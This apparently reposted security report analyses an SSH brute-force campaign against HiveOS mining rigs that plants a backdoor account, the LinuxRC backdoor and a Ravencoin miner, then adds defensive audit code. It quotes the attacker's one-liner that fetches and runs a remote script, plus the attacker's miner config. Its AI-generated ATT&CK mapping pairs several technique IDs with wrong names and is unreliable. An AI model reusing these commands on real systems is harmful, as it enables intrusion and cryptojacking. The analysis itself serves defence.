Analysis of HiveOS Attack Targeting Ravencoin Mining

Short Summary:

AhnLab Security Intelligence Center (ASEC) has identified attacks targeting improperly managed Linux servers, specifically focusing on HiveOS. Attackers exploit weak SSH credentials to gain initial access, allowing them to install backdoors and mine cryptocurrency, particularly Ravencoin.

Key Points:

  • ASEC monitors attacks on Linux servers using honeypots, particularly targeting SSH services.
  • Recent attacks on HiveOS involve brute force access to SSH services.
  • Attackers create backdoor accounts and execute malicious scripts to install malware.
  • The LinuxRC backdoor allows remote control and file operations on compromised systems.
  • Malicious scripts configure HiveOS to mine Ravencoin using the GMiner software.
  • Recommendations for administrators include using strong passwords, regular updates, and employing firewalls.

MITRE ATT&CK TTPs – created by AI

  • Initial Access (T1078)
    • Brute Force: Attackers scan for exposed SSH services and attempt to log in using brute force methods.
  • Execution (T1203)
    • Command and Scripting Interpreter: Attackers execute commands via a malicious Bash script.
  • Persistence (T1053)
    • Scheduled Task/Job: Attackers register malicious scripts as services to maintain persistence.
  • Privilege Escalation (T1068)
    • Exploitation of Vulnerability: Attackers exploit weaknesses in SSH configurations to gain elevated privileges.
  • Defense Evasion (T1070)
    • Indicator Removal on Host: Attackers delete log files to evade detection.
  • Credential Access (T1003)
    • Credential Dumping: Attackers change passwords and overwrite SSH keys to maintain access.
  • Command and Control (T1071)
    • Application Layer Protocol: Attackers use SSH for command and control over the compromised system.
  • Exfiltration (T1041)
    • Exfiltration Over Command and Control Channel: Attackers may exfiltrate data using the established SSH connection.

AhnLab Security Intelligence Center (ASEC) uses multiple honeypots to monitor attacks targeting improperly managed Linux servers. Among the most frequently targeted honeypots is an SSH service configured with weak credentials, which draws many DDoS and CoinMiner attackers.

While monitoring numerous external attacks, ASEC recently identified an attack targeting HiveOS. The initial access targeted the improperly managed SSH service, ultimately executing commands to mine new cryptocurrency and additionally installing a LinuxRC backdoor.

1. HiveOS

HiveOS is an operating system dedicated to cryptocurrency mining, used for efficiently managing and monitoring multiple mining rigs. It can be used to automate and optimize cryptocurrency mining tasks.

Like other Linux servers, systems running HiveOS can also become targets of attacks if improperly managed. Especially when using SSH services for remote management, it becomes a target for brute force and dictionary attacks. Attacks targeting HiveOS have been ongoing for several years, with most involving the creation of SSH backdoor accounts. However, a new type of attack has recently been identified.

2. Initial Access

The attacker scanned publicly exposed SSH services and attempted to log in through brute force attacks. After successfully logging in, the following commands were executed to add a “hive” account whose password hash was generated with a fixed salt. The commands then download a malicious Bash script named “run” from an external source and execute it.

# sudo useradd -p `openssl passwd -1 -salt 'salt' IB223lW2` hive -u 1000 -o -g user -G user; sudo wget hxxp://are.cloudns[.]org:12300/hfs/run -O /tmp/run; sudo dos2unix /tmp/run; sudo chmod 777 /tmp/run; sudo /bin/bash /tmp/run
# openssl passwd -1 -salt salt IB223lW2

3. Bash Script (run)

The initially executed “run” script is responsible for creating a backdoor account and installing additional payloads. First, it changes the passwords for the “hive” and “user” accounts using the following commands. It then overwrites the “authorized_keys” file with a new SSH public key.

Figure 1. Command for creating a backdoor account

While it is possible to use a password when logging into a Linux server using SSH, using an SSH key allows users to log in without entering a password. An SSH key pair (public/private keys) is created for this purpose. The public SSH key must be installed in the Linux server to log in. Once the public key is installed in the Linux server, the generated private key can be used afterward to log in from the client to the server without needing a password. In other words, through the above process, the threat actor would be able to use the private key created alongside the public key to log into the compromised system.

Then, a backdoor malware strain named “autofan” and a unit file named “autofan.service” are downloaded, and the backdoor is registered as a service. Additionally, it downloads a Bash script malware strain named “nvidia-conf”, which is responsible for the mining functions, together with a unit file named “overclock.service”, and registers it as a service as well. Once these steps are completed, it deletes multiple log files.
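The three persistence steps above (a backdoor account with a duplicate UID, a replaced authorized_keys file, and two new service units) each leave a trace an administrator can check for. The following is an added audit example, not code from the ASEC report; the unit names come from the report, while the passwd lines, keys and key placeholders are constructed sample data.

```python
"""Audit a Linux/HiveOS host for the persistence traces described above.

Added example, not code from the ASEC report. It checks /etc/passwd-style text
for shared UIDs (the backdoor account was added with `useradd -o -u 1000`, which
permits a duplicate UID), diffs authorized_keys against the administrator's known
keys, and flags the service unit names the report mentions.
"""
from collections import defaultdict

# Unit names from the report; on a real host, list /etc/systemd/system/.
SUSPICIOUS_UNITS = {"autofan.service", "overclock.service"}


def find_shared_uids(passwd_text: str) -> dict[int, list[str]]:
    """Map each UID used by more than one account to those account names."""
    by_uid: dict[int, list[str]] = defaultdict(list)
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue  # blank or malformed line
        by_uid[int(fields[2])].append(fields[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def unknown_authorized_keys(known: set[str], authorized_keys: str) -> list[str]:
    """Return 'type blob' of each authorized_keys entry not in the known set.

    Entries with a leading options field (e.g. command="...") are not handled.
    """
    unknown = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue  # comment or blank line
        key_id = f"{parts[0]} {parts[1]}"  # drop the trailing comment field
        if key_id not in known:
            unknown.append(key_id)
    return unknown


def flag_units(enabled_units) -> list[str]:
    """Return enabled unit names matching the backdoor/miner services."""
    return sorted(set(enabled_units) & SUSPICIOUS_UNITS)


# Constructed sample data: one legitimate user plus the "hive" backdoor account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
user:x:1000:1000::/home/user:/bin/bash
hive:x:1000:1000::/home/hive:/bin/bash
"""
KNOWN_KEYS = {"ssh-ed25519 AAAAC3OWNERKEYPLACEHOLDER"}  # constructed placeholder
SAMPLE_AUTHORIZED_KEYS = "ssh-rsa AAAAB3ATTACKERKEYPLACEHOLDER attacker@constructed\n"
SAMPLE_UNITS = ["ssh.service", "autofan.service", "overclock.service"]
```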

4. LinuxRC Backdoor

“Autofan” is a LinuxRC backdoor developed by “im_bill”, and its source code is available on GitHub. While it is not a well-known open-source backdoor, it has a history of being used alongside Mirai in a Spring4Shell attack case disclosed by China’s “360 Netlab” in 2022. [1]

Figure 3. GitHub Page of LinuxRC

LinuxRC is a simple backdoor that supports file browsing, downloading/uploading, command execution, and a reverse shell. The attacker can already control the compromised system over SSH, but LinuxRC additionally provides convenient remote control, including file operations.

Command    Function
CMDSHELL   Run command
SHELL2     Run command (interactive shell)
BACKDOOR   Reverse shell for the given address
EXPLORER   Browse files and directories
DOWNLOAD   Download files
UPLOAD     Upload files
OFFLINE    Terminate

Table 1. LinuxRC commands

5. Ravencoin Mining

In addition to LinuxRC, the downloader Bash script also installed another malicious Bash script named “nvidia-conf”. “nvidia-conf” is responsible for setting HiveOS’s miner to GMiner and downloading the attacker’s wallet file, as shown below. Note that because GMiner is already bundled with HiveOS, only the wallet file needs to be replaced. As a result, the infected HiveOS system mines the coin specified by the attacker.

Figure 5. HiveOS’s miner configuration routine

Typically, CoinMiners targeting Linux servers install XMRig to mine Monero. However, the CoinMiner targeting HiveOS identified this time is characterized by mining Ravencoin. Ravencoin is a Bitcoin-based cryptocurrency and blockchain platform specialized in asset transfer and management. The downloaded wallet file “wallet.conf”, shown below, sets the mining algorithm to KawPow, the algorithm used by Ravencoin, along with the mining pool address and wallet address chosen by the attacker.

### FLIGHT SHEET "nicehash" ###

# Miner gminer
GMINER_ALGO="kawpow"
GMINER_TEMPLATE="NHba7cu4BYSU15YW1i6amYj9rUsf1SG7NU7r.rig_def"
GMINER_HOST="kawpow.auto.nicehash[.]com"
GMINER_PORT="9200"
GMINER_PASS="x"

META='{"fs_id":17495019,"gminer":{"coin":"Nicehash-KawPow"}}'
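Because the attacker only swaps the flight sheet, a rig owner can detect the hijack by parsing wallet.conf and comparing the pool host, wallet and algorithm against the values they configured. The following parser and check is an added example, not code from the report or from HiveOS; the owner's expected pool and wallet are constructed placeholders, and the sample sheet reproduces the defanged file quoted above.

```python
"""Parse a HiveOS flight sheet (wallet.conf) and check it against owner settings.

Added example, not code from the ASEC report or HiveOS. The format is the
shell-style KEY="value" (or KEY='value') assignments shown above; META holds JSON.
"""
import json
import re

# One KEY="value" or KEY='value' assignment per line; anything else is ignored.
_ASSIGN = re.compile(r"""^\s*([A-Z_]+)=(?:"([^"]*)"|'([^']*)')\s*$""")


def parse_flight_sheet(text: str) -> dict:
    """Return the assignments as a dict; the META value is decoded from JSON."""
    sheet = {}
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue  # comment lines (### ... ###, # Miner ...) and blank lines
        key = m.group(1)
        value = m.group(2) if m.group(2) is not None else m.group(3)
        sheet[key] = json.loads(value) if key == "META" else value
    return sheet


def audit_flight_sheet(sheet: dict, expected: dict) -> list[str]:
    """List every miner setting that deviates from what the owner configured."""
    findings = []
    host = sheet.get("GMINER_HOST", "")
    if host not in expected["pools"]:
        findings.append(f"unexpected pool host: {host}")
    # GMINER_TEMPLATE is "<wallet>.<worker>"; compare the wallet part only.
    wallet = sheet.get("GMINER_TEMPLATE", "").split(".", 1)[0]
    if wallet not in expected["wallets"]:
        findings.append(f"unexpected wallet: {wallet}")
    if sheet.get("GMINER_ALGO") != expected["algo"]:
        findings.append(f"unexpected algorithm: {sheet.get('GMINER_ALGO')}")
    return findings


# Constructed sample reproducing the wallet.conf quoted in the report (defanged host).
SAMPLE_SHEET = '''### FLIGHT SHEET "nicehash" ###

# Miner gminer
GMINER_ALGO="kawpow"
GMINER_TEMPLATE="NHba7cu4BYSU15YW1i6amYj9rUsf1SG7NU7r.rig_def"
GMINER_HOST="kawpow.auto.nicehash[.]com"
GMINER_PORT="9200"
GMINER_PASS="x"

META='{"fs_id":17495019,"gminer":{"coin":"Nicehash-KawPow"}}'
'''

# Owner's own configuration: constructed placeholders, not real values.
OWNER_EXPECTED = {"pools": {"pool.example.org"}, "wallets": {"OWNERWALLETPLACEHOLDER"}, "algo": "kawpow"}
```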

6. Conclusion

Recently, cryptojacking attacks targeting improperly managed HiveOS servers have been occurring. HiveOS, an operating system dedicated to cryptocurrency mining, has become a target because its SSH server, used for remote management, is run with weak account credentials. After the initial access, the attacker configured the system to mine Ravencoin and also installed the LinuxRC backdoor.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force and dictionary attacks, and apply the latest patches to prevent vulnerability exploitation. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access by threat actors. Lastly, V3 should be kept updated to the latest version so that malware infections are blocked in advance.

File Detection
– Downloader/BASH.Miner (2024.09.20.02)
– Backdoor/Linux.Shell.23272 (2024.09.20.02)
– Downloader/BASH.Miner.SC204555 (2024.09.20.02)
– Data/BIN.Config (2024.10.06.03)


Source : https://asec.ahnlab.com/en/83857/